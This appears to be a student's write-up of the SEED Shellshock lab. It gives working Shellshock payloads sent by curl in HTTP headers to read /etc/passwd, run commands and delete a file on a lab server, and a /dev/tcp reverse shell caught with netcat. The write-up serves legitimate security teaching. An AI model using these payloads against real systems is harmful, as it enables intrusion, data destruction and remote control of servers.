# Lab 0

https://moodle.up.pt/pluginfile.php/183862/mod_resource/content/2/0_Shellshock.pdf

Many web servers enable (Common Gateway Interface) CGI, which is a standard method used to generate dynamic content on web pages and for web applications. Many CGI programs are shell scripts, so before the actual CGI program runs, a shell program will be invoked first.

A shell program will be invoked first (CGI programs are shell scripts), and such an invocation is triggered by users from remote computers. If the shell program is a vulnerable bash program, we can exploit the Shellshock vulnerable to gain privileges on the server. 

Our web server container as a very simple CGI program 'vul.cgi'
The CGI program is put inside Apache’s default CGI folder /usr/lib/cgi-bin, and it must be executable.

Shellshock Vulnerability - A parent process can pass a function definition to a child shell process via an environment variable.
Due to a bug in the parsing logic, bash executes some of the command contained in the variable. An attacker can set the environment for a privileged bash process on the local machine, to exploit the shellshock vulnerability and run commands with the target process’s privilege. 

	1. Our attack basically defines a shell variable foo
	2. We export this shell variable, so when we run the Set-UID program (vul), the shell variable becomes an environment variable of the child process
	3. Because system() invokes bash, it detects that the environment variable is a function declaration
	4. Due to the bug in the parsing logic, it ends up executing the command “/bin/sh”
	5. Hence, we get the root shell


When a user sends a CGI URL to the Apache web server, Apache will examine the request
If it is a CGI request, Apache will use fork() to start a new process and then use the exec() functions to execute the CGI program
Because our CGI program starts with “#! /bin/bash”, exec() actually executes /bin/bash, which then runs the shell script
When Apache creates a child process, it provides all the environment variables for the bash programs. 
We can use the “-A” option of the command line tool “curl” to change the user-agent field to whatever we want, meaning we can run commands in the server. 


## 3.1 Task 1: Experimenting with Bash Function 

To open a shell in the container:
`docksh <container_id>`

NOTE: replace <container_id> with the prefix of the container from
`dockps`.

Make sure that the container is running: 
$ curl http://www.seedlab-shellshock.com/cgi-bin/vul.cgi 

### Steps 

First thing to note is that, by default, we're running a newer and patched version
of the bash shell:

```bash
root@5bec207048fa:/bin# echo $BASH_VERSION 
5.0.17(1)-release
```

In order to use the vulnerable one, we need to execute it by calling the
`bash_shellshock` and test the version just for sanity check.

```bash
root@5bec207048fa:/bin# bash_shellshock 
root@5bec207048fa:/bin# echo $BASH_VERSION 
4.2.0(1)-release
```

Now we can try to exploit the vulnerability assign a env variable with the
malicious string:

```bash
root@5bec207048fa:/bin# env x='() { :;}; echo vulnerable' bash_shellshock -c "echo this is a test"                           
vulnerable
this is a test
```

Nice, it worked. Now, for comparison, let's try to execute the exploit in the newer and patched
version of bash:

```bash
root@5bec207048fa:/bin# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"                                      
this is a test
```

## 3.2

### Task 2.A: Using brower

Run http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi

The Environment variable are set by the browser is: 
HTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0

We got to this conclusion using HTTP Header Live extension by deleting the User-Agent field and verifying that it gets returned in the request. 

#### HTTP Header
- Host: www.seedlab-shellshock.com
- User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: keep-alive
- Upgrade-Insecure-Requests: 1
- GET: HTTP/1.1 200 OK
- Date: Sat, 19 Mar 2022 16:52:25 GMT
- Server: Apache/2.4.41 (Ubuntu)
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 617
- Keep-Alive: timeout=5, max=100
- Connection: Keep-Alive
- Content-Type: text/plain


### Task 2.A: Using curl 
Curl is a very powerful tool that allows a lot of customization. For this lab, the options of interest are `-A`, `-e` and `-H`.
Their functionality is listed bellow:

- `-A`: allows to customize the User-Agent header.
- `-e`: allows to send custom the “Referrer Page” information.
- `-H`: allows to send a custom header.

We can use CGI to run shell commands. When we call for a child process in CGI, Enviormental variables are called. If we can define enviormental variables, then we can use them to run commands.

We can use the commad:
$ curl -A "Vulnerability" -v www.seedlab-shellshock.com/cgi-bin/getenv.cgi

To set a new environment variable in field User-Agent. We can set this as a function. Then, calling a child process trough CGI, since the Enviormental variables will be called, the "Vulnerability" function will run.

## 3.3
Since the vulnerability happens when we have a malicious `() { :; }` (inline function definition), our goal is to set (or append to) any env var to that malicious string. From task 2.A, we've seen how to modify variables set by apache, so it's obvious (not so much actually) that we must use header fields to inject our payload. But first, let's check if the provided bash is vulnerabl and if our own shell is too. The following test should do the trick:

```shell
[03/24/22]seed@vm:~/.../Labsetup$ ./image_www/bash_shellshock () { :; }; echo oi
oi
oi
[03/24/22]seed@vm:~/.../Labsetup$ bash () { :; }; echo oi
oi  
03/25/22]seed@vm:~/.../Labsetup$ /bin/bash --version
GNU bash, versão 5.1.4(1)-release (x86_64-pc-linux-gnu)
```

Here we can see the `echo oi` command being executed two times in the vulnerable shell, one as a misinterpreted function and another as a normal command. In the newer and patched shell, the `echo oi` is only executed one time as it's expected.

### Task 3.A)
```
[03/24/22]seed@vm:~/.../Labsetup$ curl -v http://www.seedlab-shellshock.com/cgi-bin/vul.cgi -A "() { :; }; echo Content-Type: text/plain; echo; /bin/cat /etc/passwd"
*   Trying 10.9.0.80:80...
* Connected to www.seedlab-shellshock.com (10.9.0.80) port 80 (#0)
> GET /cgi-bin/vul.cgi HTTP/1.1
> Host: www.seedlab-shellshock.com
> User-Agent: () { :; }; echo Content-Type: text/plain; echo; /bin/cat /etc/passwd
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 24 Mar 2022 23:12:00 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/plain
< 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
* Connection #0 to host www.seedlab-shellshock.com left intact
```

### Task 3.B)
```
[03/25/22]seed@vm:~/.../Labsetup$ curl -v http://www.seedlab-shellshock.com/cgi-bin/vul.cgi -e "() { :; }; echo Content-Type: text/plain; echo; /bin/id"
*   Trying 10.9.0.80:80...
* Connected to www.seedlab-shellshock.com (10.9.0.80) port 80 (#0)
> GET /cgi-bin/vul.cgi HTTP/1.1
> Host: www.seedlab-shellshock.com
> User-Agent: curl/7.74.0
> Accept: */*
> Referer: () { :; }; echo Content-Type: text/plain; echo; /bin/id
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Fri, 25 Mar 2022 00:25:06 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 54
< Content-Type: text/plain
< 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* Connection #0 to host www.seedlab-shellshock.com left intact
```

### Task 3.C)
```
[03/24/22]seed@vm:~/.../Labsetup$ curl -v http://www.seedlab-shellshock.com/cgi-bin/vul.cgi -H "Test: () { :; }; echo Content-Type: text/plain; echo; /bin/ls /tmp/"
*   Trying 10.9.0.80:80...
* Connected to www.seedlab-shellshock.com (10.9.0.80) port 80 (#0)
> GET /cgi-bin/vul.cgi HTTP/1.1
> Host: www.seedlab-shellshock.com
> User-Agent: curl/7.74.0
> Accept: */*
> Test: () { :; }; echo Content-Type: text/plain; echo; /bin/ls /tmp/
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 24 Mar 2022 23:16:29 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 5
< Content-Type: text/plain
< 
test
* Connection #0 to host www.seedlab-shellshock.com left intact
[03/24/22]seed@vm:~/.../Labsetup$ curl -v http://www.seedlab-shellshock.com/cgi-bin/vul.cgi -H "Test: () { :; }; echo Content-Type: text/plain; echo; /bin/ls /tmp/ -l"
*   Trying 10.9.0.80:80...
* Connected to www.seedlab-shellshock.com (10.9.0.80) port 80 (#0)
> GET /cgi-bin/vul.cgi HTTP/1.1
> Host: www.seedlab-shellshock.com
> User-Agent: curl/7.74.0
> Accept: */*
> Test: () { :; }; echo Content-Type: text/plain; echo; /bin/ls /tmp/ -l
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 24 Mar 2022 23:16:36 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 64
< Content-Type: text/plain
< 
total 48
-rw-r--r-- 1 www-data www-data 47480 Mar 24 23:16 test
* Connection #0 to host www.seedlab-shellshock.com left intact
```

### Task 3.D)
```
[03/24/22]seed@vm:~/.../Labsetup$ curl -v http://www.seedlab-shellshock.com/cgi-bin/vul.cgi -H "Test: () { :; }; echo Content-Type: text/plain; echo; /bin/rm /tmp/test"
*   Trying 10.9.0.80:80...
* Connected to www.seedlab-shellshock.com (10.9.0.80) port 80 (#0)
> GET /cgi-bin/vul.cgi HTTP/1.1
> Host: www.seedlab-shellshock.com
> User-Agent: curl/7.74.0
> Accept: */*
> Test: () { :; }; echo Content-Type: text/plain; echo; /bin/rm /tmp/test
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 24 Mar 2022 23:18:11 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 0
< Content-Type: text/plain
< 
* Connection #0 to host www.seedlab-shellshock.com left intact
[03/24/22]seed@vm:~/.../Labsetup$ curl -v http://www.seedlab-shellshock.com/cgi-bin/vul.cgi -H "Test: () { :; }; echo Content-Type: text/plain; echo; /bin/ls /tmp/ -l"
*   Trying 10.9.0.80:80...
* Connected to www.seedlab-shellshock.com (10.9.0.80) port 80 (#0)
> GET /cgi-bin/vul.cgi HTTP/1.1
> Host: www.seedlab-shellshock.com
> User-Agent: curl/7.74.0
> Accept: */*
> Test: () { :; }; echo Content-Type: text/plain; echo; /bin/ls /tmp/ -l
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 24 Mar 2022 23:18:13 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 8
< Content-Type: text/plain
< 
total 0
* Connection #0 to host www.seedlab-shellshock.com left intact
[03/24/22]seed@vm:~/.../Labsetup$ curl -v http://www.seedlab-shellshock.com/cgi-bin/vul.cgi -e "() { :; }; echo Content-Type: text/plain; echo; /bin/ls /tmp/ -l"
*   Trying 10.9.0.80:80...
* Connected to www.seedlab-shellshock.com (10.9.0.80) port 80 (#0)
> GET /cgi-bin/vul.cgi HTTP/1.1
> Host: www.seedlab-shellshock.com
> User-Agent: curl/7.74.0
> Accept: */*
> Referer: () { :; }; echo Content-Type: text/plain; echo; /bin/ls /tmp/ -l
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 24 Mar 2022 23:19:59 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 8
< Content-Type: text/plain
< 
total 0
* Connection #0 to host www.seedlab-shellshock.com left intact
```

## Task 4
```
[03/25/22]seed@vm:~/.../Labsetup$ curl -v http://www.seedlab-shellshock.com/cgi-bin/vul.cgi -e "() { :; }; /bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1"
*   Trying 10.9.0.80:80...
* Connected to www.seedlab-shellshock.com (10.9.0.80) port 80 (#0)
> GET /cgi-bin/vul.cgi HTTP/1.1
> Host: www.seedlab-shellshock.com
> User-Agent: curl/7.74.0
> Accept: */*
> Referer: () { :; }; /bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1
> 

charles@vm:~$ nc -lvp 9090
listening on [any] 9090 ...
/bin/ls
connect to [10.9.0.1] from www.seedlab-shellshock.com [10.9.0.80] 46356
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
www-data@5bec207048fa:/usr/lib/cgi-bin$ /bin/ls
getenv.cgi
vul.cgi
www-data@5bec207048fa:/usr/lib/cgi-bin$ /bin/ls
/bin/ls
getenv.cgi
vul.cgi
www-data@5bec207048fa:/usr/lib/cgi-bin$ whoami
whoami
www-data
www-data@5bec207048fa:/usr/lib/cgi-bin$ 
```


## References 

https://www.handsonsecurity.net/files/slides/03_Shellshock.pptx
